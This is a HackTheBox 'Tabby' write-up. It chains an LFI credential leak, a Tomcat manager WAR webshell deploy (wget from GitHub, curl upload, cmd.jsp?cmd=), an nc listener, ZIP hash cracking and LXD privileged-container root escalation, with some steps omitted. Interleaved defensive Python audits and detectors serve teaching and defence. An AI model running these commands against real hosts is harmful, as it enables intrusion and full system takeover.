HTB — Tabby
LFI on Tomcat manager exposes credentials. WAR file deployed for RCE. ZIP password cracking, LXD container privilege escalation for root.
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.194
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 16:41 EST
Nmap scan report for 10.10.10.194
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/26%OT=22%CT=1%CU=44434%PV=Y%DS=2%DC=T%G=Y%TM=674
OS:6409B%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=2%ISR=106%T
OS:I=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=
OS:M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE
OS:88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%
OS:DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 23.98 ms 10.10.14.1
2 24.13 ms 10.10.10.194
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.40 seconds
80/tcp open http
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)

feroxbuster
feroxbuster --url http://10.10.10.194
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.194
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 313c http://10.10.10.194/assets => http://10.10.10.194/assets/
301 GET 9l 28w 317c http://10.10.10.194/assets/css => http://10.10.10.194/assets/css/
301 GET 9l 28w 319c http://10.10.10.194/assets/fonts => http://10.10.10.194/assets/fonts/
200 GET 60l 80w 1510c http://10.10.10.194/assets/fonts/stylesheet.css
200 GET 128l 251w 3282c http://10.10.10.194/assets/js/main.js
200 GET 7l 400w 35601c http://10.10.10.194/assets/js/vendor/bootstrap.min.js
200 GET 536l 897w 8362c http://10.10.10.194/assets/css/fonticons.css
200 GET 9l 80w 3918c http://10.10.10.194/assets/js/jquery.easypiechart.min.js
200 GET 111l 179w 1713c http://10.10.10.194/assets/css/responsive.css
200 GET 14l 302w 28935c http://10.10.10.194/assets/js/jquery.mixitup.min.js
200 GET 822l 1392w 13934c http://10.10.10.194/assets/css/style.css
200 GET 12l 689w 40858c http://10.10.10.194/assets/js/vendor/isotope.min.js
200 GET 4l 1412w 95931c http://10.10.10.194/assets/js/vendor/jquery-1.11.2.min.js
200 GET 5l 1421w 113498c http://10.10.10.194/assets/css/bootstrap.min.css
301 GET 9l 28w 312c http://10.10.10.194/files => http://10.10.10.194/files/
301 GET 9l 28w 316c http://10.10.10.194/assets/js => http://10.10.10.194/assets/js/
301 GET 9l 28w 320c http://10.10.10.194/assets/images => http://10.10.10.194/assets/images/
200 GET 17l 68w 5223c http://10.10.10.194/logo.png
200 GET 11l 391w 20106c http://10.10.10.194/assets/js/vendor/modernizr-2.8.3-respond-1.4.2.min.js
200 GET 4l 63w 26711c http://10.10.10.194/assets/css/font-awesome.min.css
200 GET 85l 868w 67760c http://10.10.10.194/assets/js/plugins.js
200 GET 3055l 5810w 128648c http://10.10.10.194/assets/css/plugins.css
200 GET 373l 938w 14175c http://10.10.10.194/
301 GET 9l 28w 320c http://10.10.10.194/files/archive => http://10.10.10.194/files/archive/
301 GET 9l 28w 323c http://10.10.10.194/assets/js/vendor => http://10.10.10.194/assets/js/vendor/
200 GET 150l 375w 6507c http://10.10.10.194/files/statement
[####################] - 62s 270079/270079 0s found:26 errors:111
[####################] - 61s 30000/30000 494/s http://10.10.10.194/
[####################] - 58s 30000/30000 514/s http://10.10.10.194/assets/
[####################] - 61s 30000/30000 494/s http://10.10.10.194/assets/images/
[####################] - 61s 30000/30000 493/s http://10.10.10.194/assets/css/
[####################] - 60s 30000/30000 501/s http://10.10.10.194/assets/fonts/
[####################] - 56s 30000/30000 538/s http://10.10.10.194/files/
[####################] - 56s 30000/30000 538/s http://10.10.10.194/assets/js/
[####################] - 56s 30000/30000 540/s http://10.10.10.194/files/archive/
[####################] - 54s 30000/30000 552/s http://10.10.10.194/assets/js/vendor/ 
LFI

8080/tcp open http
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

tomcat-users.xml
view-source:http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
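The `file=` parameter above is handed to the include without confinement, which is why seven `../` segments walk from the web root to Tomcat's config. The following is an added example (Python, not the box's PHP and not part of the write-up) that puts the unchecked join next to a resolver that decodes once, canonicalises, and refuses anything that leaves the document root; the `DOC_ROOT` value and the page names are assumptions for the demonstration.

```python
"""Path-confinement check for a 'file=' style include parameter.

Added example: not code from the Tabby box or its web app. It contrasts the
unchecked join behind news.php?file=../../.. with a resolver that confines
every decoded path to a document root.
"""
import os
from urllib.parse import unquote

# Constructed document root; the real site serves /files/statement from its own directory.
DOC_ROOT = "/var/www/html/files"


def unsafe_resolve(doc_root, user_path):
    """The risky pattern: the request parameter is joined onto the root and used as-is."""
    return os.path.normpath(os.path.join(doc_root, unquote(user_path)))


def safe_resolve(doc_root, user_path):
    """Decode once, canonicalise, then require the result to remain under doc_root.

    Returns the canonical path, or None when the request escapes the root.
    """
    decoded = unquote(user_path)
    if "\x00" in decoded:            # NUL bytes truncate paths in some runtimes
        return None
    root = os.path.realpath(doc_root)
    # os.path.join discards root when the user path is absolute, so an absolute
    # request lands outside root and is rejected by the prefix check below.
    # A double-encoded "%252e%252e" decodes to the literal "%2e%2e", which is
    # just an odd filename under root, not a traversal.
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def serve(doc_root, user_path, allowed_names=None):
    """Stricter policy: only explicitly named pages, still resolved through safe_resolve."""
    if allowed_names is not None and user_path not in allowed_names:
        return None
    return safe_resolve(doc_root, user_path)


if __name__ == "__main__":
    probe = "../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml"  # traversal seen on the box
    print("unsafe ->", unsafe_resolve(DOC_ROOT, probe))
    print("safe   ->", safe_resolve(DOC_ROOT, probe))
    print("page   ->", serve(DOC_ROOT, "statement", allowed_names={"statement"}))
```

`safe_resolve` is the general fix; `serve` with an allow-list is the one to prefer when the set of includable pages is small and known, because then the parameter never names a filesystem path at all.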

creds
tomcat:$3cureP4s5w0rd123!
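The credential is usable because the account carries the `manager-script` role that the `/manager/text` interface checks. As an added example (not from the write-up or from Tomcat), this audit parses a `tomcat-users.xml` in Tomcat's own format and lists which accounts can reach the Manager apps, which of them can deploy through the script interface, and whether the file is readable by every local user; the sample XML and its placeholder passwords are constructed.

```python
"""Audit tomcat-users.xml for Manager-capable accounts and loose file permissions.

Added example, not part of the Tabby write-up or of Tomcat. The sample XML is
constructed in Tomcat's format with placeholder passwords.
"""
import os
import stat
import xml.etree.ElementTree as ET

# Roles that reach the Manager / Host Manager apps; manager-script is the one the
# text interface (/manager/text/deploy) requires.
MANAGER_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}
SCRIPT_ROLES = {"manager-script", "manager-jmx", "admin-script"}

SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="PLACEHOLDER-1" roles="admin-gui,manager-script"/>
  <user username="monitor" password="PLACEHOLDER-2" roles="manager-status"/>
  <user username="app" password="PLACEHOLDER-3" roles="probe"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace Tomcat puts on its elements."""
    return tag.rsplit("}", 1)[-1]


def manager_accounts(xml_text):
    """Map username -> sorted list of manager/admin roles, for users holding any."""
    findings = {}
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        hits = sorted(roles & MANAGER_ROLES)
        if hits:
            findings[elem.get("username")] = hits
    return findings


def script_capable(xml_text):
    """Usernames that can deploy WARs through the text/JMX interfaces without a browser."""
    return sorted(user for user, roles in manager_accounts(xml_text).items()
                  if SCRIPT_ROLES & set(roles))


def world_readable(path):
    """True when every local user can read the file.

    A file-read bug in a web app only discloses what the web server's account can
    read; a world-readable credentials file is the usual reason that includes
    another service's config.
    """
    return bool(os.stat(path).st_mode & stat.S_IROTH)


if __name__ == "__main__":
    print(manager_accounts(SAMPLE_XML))
    print("script-capable:", script_capable(SAMPLE_XML))
```

Run it against the real file on a host you administer (`world_readable("/usr/share/tomcat9/etc/tomcat-users.xml")` on Ubuntu's tomcat9 layout) and treat any script-capable account as a deploy credential that needs the same protection as a shell account.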

feroxbuster --url http://10.10.10.194:8080/manager
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.194:8080/manager
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 44l 184w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c http://10.10.10.194:8080/manager => http://10.10.10.194:8080/manager/
302 GET 0l 0w 0c http://10.10.10.194:8080/manager/images => http://10.10.10.194:8080/manager/images/
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/text/
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/text/css
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/html
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/text
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/status
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/[
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/plain]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/plain]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/[
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/quote]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/quote]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/extension]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/extension]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/[0-9]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/[0-9]

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

curl --upload-file backup.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/backup"
OK - Deployed application at context path [/backup]

http://10.10.10.194:8080/backup/cmd.jsp?cmd=whoami
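Every step of that deploy is recorded by Tomcat's AccessLogValve: the 401 from probing `/manager`, the authenticated `PUT` to `/manager/text/deploy`, and the first requests into the new context. The following is an added example (not from the write-up or from Tomcat) that reads log lines in the valve's `common` pattern (`%h %l %u %t "%r" %s %b`, where the third field is the authenticated user) and raises alerts for those three events, learning the deployed context path from the deploy request itself. The log lines are constructed to mirror the sequence above.

```python
"""Flag Manager-app activity in Tomcat access logs.

Added example, not from the write-up or from Tomcat. Reads lines in the
AccessLogValve "common" pattern and alerts on failed Manager logins,
successful deploys, and traffic into the context a deploy created.
The sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Endpoints that install a new web application. The text interface names the
# context in ?path=; the HTML upload form derives it from the WAR filename, so
# no context is learned from that one.
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload")
# Query parameter names commonly carried by command-style JSP pages.
COMMAND_PARAMS = {"cmd", "command", "exec"}

SAMPLE_LOG = """\
10.10.14.4 - - [27/Nov/2024:02:05:01 +0000] "GET /manager/html HTTP/1.1" 401 2499
10.10.14.4 - tomcat [27/Nov/2024:02:05:11 +0000] "PUT /manager/text/deploy?path=/backup HTTP/1.1" 200 49
10.10.14.4 - - [27/Nov/2024:02:05:20 +0000] "GET /backup/cmd.jsp?cmd=whoami HTTP/1.1" 200 312
10.10.14.9 - - [27/Nov/2024:02:06:00 +0000] "GET /docs/index.html HTTP/1.1" 200 19072
"""


def parse_line(line):
    """Dict of the common-pattern fields, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text):
    """Return [(ip, target, [reasons])] for every request that deserves a look."""
    deployed = {}   # context path -> ip that deployed it, learned from successful deploys
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        url = urlsplit(entry["target"])
        path = unquote(url.path)
        query = parse_qs(url.query)
        reasons = []
        if path in DEPLOY_PATHS and entry["status"] == "200":
            context = query.get("path", [""])[0]
            if context:
                deployed[context] = entry["ip"]
            reasons.append("manager deploy as user %s" % entry["user"])
        elif path.startswith("/manager/") and entry["status"] == "401":
            reasons.append("manager authentication failure")
        for context in deployed:
            if path.startswith(context.rstrip("/") + "/"):
                reasons.append("request into newly deployed context %s" % context)
        if path.endswith(".jsp") and COMMAND_PARAMS & set(query):
            reasons.append("jsp invoked with command-style parameter")
        if reasons:
            alerts.append((entry["ip"], entry["target"], reasons))
    return alerts


if __name__ == "__main__":
    for ip, target, reasons in analyse(SAMPLE_LOG):
        print(ip, target, "; ".join(reasons))
```

The deploy alert is the one worth paging on: a successful `/manager/text/deploy` from an address that is not your CI host is a new application appearing on the server, whatever it is called. Restricting the Manager apps to trusted source addresses with a `RemoteAddrValve` removes the path entirely on hosts that never deploy remotely.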

rev shell

nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.194] 58250
whoiami
whoami
tomcat

python3 -c 'import pty; pty.spawn("/bin/bash")'

backup.zip
tomcat@tabby:/var/www/html/files$ ls -al
ls -al
total 36
drwxr-xr-x 4 ash ash 4096 Aug 19 2021 .
drwxr-xr-x 4 root root 4096 Aug 19 2021 ..
-rw-r--r-- 1 ash ash 8716 Jun 16 2020 16162020_backup.zip
drwxr-xr-x 2 root root 4096 Aug 19 2021 archive
drwxr-xr-x 2 root root 4096 Aug 19 2021 revoked_certs
-rw-r--r-- 1 root root 6507 Jun 16 2020 statement

wget http://10.10.10.194:9000/16162020_backup.zip

- password protected
unzip 16162020_backup.zip -d backup
Archive: 16162020_backup.zip
creating: backup/var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password:

zip2john 16162020_backup.zip > 16162020_backup.hash
john --wordlist=/usr/share/wordlists/rockyou.txt 16162020_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (16162020_backup.zip)

creds
ash:admin@it
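John's `PKZIP` format line says why the crack was cheap: the archive uses legacy ZipCrypto, whose password check runs entirely offline at high speed, and the password was in rockyou. As an added example (not from the write-up), the audit below classifies each archive entry as unprotected, ZipCrypto, or WinZip AES (method 99 plus the 0x9901 extra field) so that a backup left under a web root can be judged before it is relied on. `zipfile` cannot write encrypted entries, so the encrypted sample entries are `ZipInfo` records built by hand with the header fields a real archive carries; the filenames reuse the listing above.

```python
"""Report how entries in a ZIP archive are protected.

Added example, not part of the write-up. Legacy ZipCrypto (PKZIP) protection is
what zip2john/john attack offline; WinZip AES entries are marked by method 99
and the 0x9901 extra field. The encrypted sample entries are ZipInfo records
built by hand because zipfile cannot write encrypted entries.
"""
import io
import struct
import zipfile

ENCRYPTED_FLAG = 0x0001     # general-purpose bit 0
AES_METHOD = 99             # compression method reserved for WinZip AES
AES_EXTRA_ID = 0x9901


def _has_aes_extra(extra):
    """Walk the extra field's id/size records looking for the AES header."""
    pos = 0
    while pos + 4 <= len(extra):
        header_id, size = struct.unpack("<HH", extra[pos:pos + 4])
        if header_id == AES_EXTRA_ID:
            return True
        pos += 4 + size
    return False


def entry_protection(info):
    """'none', 'zipcrypto' or 'aes' for one ZipInfo."""
    if not info.flag_bits & ENCRYPTED_FLAG:
        return "none"
    if info.compress_type == AES_METHOD or _has_aes_extra(info.extra):
        return "aes"
    return "zipcrypto"


def audit(infos):
    """Group entry names by protection class."""
    report = {"none": [], "zipcrypto": [], "aes": []}
    for info in infos:
        report[entry_protection(info)].append(info.filename)
    return report


def audit_zip_bytes(data):
    """Audit an archive held in memory; pass open(path, 'rb').read() for a file on disk."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return audit(zf.infolist())


def constructed_sample():
    """Three hand-built entries: plain, ZipCrypto, and WinZip AES-256."""
    plain = zipfile.ZipInfo("var/www/html/logo.png")
    legacy = zipfile.ZipInfo("var/www/html/news.php")
    legacy.flag_bits |= ENCRYPTED_FLAG
    legacy.compress_type = zipfile.ZIP_DEFLATED
    aes = zipfile.ZipInfo("var/www/html/Readme.txt")
    aes.flag_bits |= ENCRYPTED_FLAG
    aes.compress_type = AES_METHOD
    # AES extra: id, data size 7, AE-2 version, vendor "AE", strength 3 (256-bit), real method deflate
    aes.extra = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", 3, zipfile.ZIP_DEFLATED)
    return [plain, legacy, aes]


def plain_archive_bytes():
    """An unencrypted archive written with zipfile, exercising the audit_zip_bytes path."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("var/www/html/index.php", "<?php echo 'constructed sample'; ?>")
    return buf.getvalue()


if __name__ == "__main__":
    print(audit(constructed_sample()))
    print(audit_zip_bytes(plain_archive_bytes()))
```

Anything in the `zipcrypto` bucket should be treated as unencrypted for risk purposes: the format leaks enough to verify guesses offline, so its protection is only as good as the password's resistance to a wordlist. A backup that contains application source and credentials should not sit under a web root at all, whatever the archive format.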
unzip 16162020_backup.zip -d backup
Archive: 16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password:
inflating: backup/var/www/html/favicon.ico
creating: backup/var/www/html/files/
inflating: backup/var/www/html/index.php
extracting: backup/var/www/html/logo.png
inflating: backup/var/www/html/news.php
inflating: backup/var/www/html/Readme.txt

tomcat@tabby:/home$ su ash
su ash
Password: admin@it
ash@tabby:/home$ whoami
whoami
ash

user.txt
ash@tabby:~$ cat user.txt
cat user.txt
650898c7...

priv esc
ash@tabby:~$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

lxd group
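Membership of `lxd` is the whole privilege escalation: the group grants access to the LXD socket, and whoever can talk to it can start a privileged container with host storage attached. As an added example (not from the write-up), this check finds such memberships from `/etc/group` and from `id` output, so a host audit catches it before someone else does. The `/etc/group` text is constructed; the `id` line is the one above.

```python
"""Spot accounts whose group membership is effectively root.

Added example, not from the write-up. The lxd and docker groups expose a
daemon that runs containers as root; disk exposes block devices; sudo and
wheel depend on policy. The /etc/group sample is constructed; ID_LINE is the
id(1) output from the write-up.
"""
import re

# group name -> why it matters
ROOT_EQUIVALENT = {
    "lxd": "can launch privileged containers and attach host disks",
    "docker": "can run containers as root with host bind mounts",
    "disk": "raw read/write access to block devices",
    "sudo": "sudo policy decides; review /etc/sudoers",
    "wheel": "sudo/su policy decides; review configuration",
}

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,ash
cdrom:x:24:ash
sudo:x:27:
lxd:x:116:ash
docker:x:998:
"""

ID_LINE = "uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)"


def parse_group_file(text):
    """Yield (group, gid, [members]) from /etc/group-formatted text."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, gid, members = line.split(":", 3)
        yield name, int(gid), [m for m in members.split(",") if m]


def risky_memberships(group_text):
    """Map user -> sorted list of root-equivalent groups they belong to."""
    found = {}
    for group, _, members in parse_group_file(group_text):
        if group in ROOT_EQUIVALENT:
            for user in members:
                found.setdefault(user, []).append(group)
    return {user: sorted(groups) for user, groups in found.items()}


def groups_from_id(id_output):
    """Group names from the output of id(1)."""
    m = re.search(r"groups=(.*)$", id_output)
    return re.findall(r"\d+\(([^)]+)\)", m.group(1)) if m else []


def risky_from_id(id_output):
    """Root-equivalent groups present in an id(1) line, sorted."""
    return sorted(set(groups_from_id(id_output)) & set(ROOT_EQUIVALENT))


if __name__ == "__main__":
    for user, groups in risky_memberships(SAMPLE_GROUP).items():
        for group in groups:
            print("%s is in %s: %s" % (user, group, ROOT_EQUIVALENT[group]))
    print("from id:", risky_from_id(ID_LINE))
```

On a live host, `risky_memberships(open("/etc/group").read())` gives the list to review. The fix is to treat `lxd` and `docker` membership as equivalent to a sudo grant and remove it from accounts that do not need it, rather than trying to constrain what those daemons will do once reached.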
/root/go/bin/distrobuilder build-lxc alpine.yaml -o image.release=3.18

┌──(root㉿kali)-[/home/…/htb-labs/Tabby/ContainerImages/alpine]
└─# ls
alpine.yaml meta.tar.xz rootfs.tar.xz

ash@tabby:~$ wget http://10.10.14.4/meta.tar.xz
ash@tabby:~$ wget http://10.10.14.4/rootfs.tar.xz

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

ash@tabby:~$ wget http://10.10.14.4/alpine-v3.13-x86_64-20210218_0139.tar.gz
ash@tabby:~$ /snap/bin/lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias ubuntutemp
ash@tabby:~$ /snap/bin/lxc image list
/snap/bin/lxc image list
+------------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+------------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ubuntutemp | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | CONTAINER | 3.11MB | Nov 27, 2024 at 2:08am (UTC) |
+------------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

ash@tabby:~$ /snap/bin/lxd init
/snap/bin/lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: [Enter]
Do you want to configure a new storage pool? (yes/no) [default=yes]: [Enter]
Name of the new storage pool [default=default]: [Enter]
Name of the storage backend to use (dir, lvm, zfs, ceph, btrfs) [default=zfs]: [Enter]
Create a new ZFS pool? (yes/no) [default=yes]: [Enter]
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: [Enter]
Size in GB of the new loop device (1GB minimum) [default=5GB]: [Enter]
Would you like to connect to a MAAS server? (yes/no) [default=no]: [Enter]
Would you like to create a new local network bridge? (yes/no) [default=yes]: [Enter]
What should the new bridge be called? [default=lxdbr0]: [Enter]
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: none
none
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: none
none
Would you like the LXD server to be available over the network? (yes/no) [default=no]: [Enter]
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] [Enter]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: [Enter]
ash@tabby:~$ /snap/bin/lxc init ubuntutemp ignite -c security.privileged=true
ash@tabby:~$ /snap/bin/lxc start ignite
ash@tabby:~$ /snap/bin/lxc exec ignite /bin/sh
~ # id
id
uid=0(root) gid=0(root)

cd /mnt

/mnt # ls
ls
root

/mnt # cd root
cd root

root.txt

/mnt/root/root # cat root.txt
cat root.txt
361ca58d...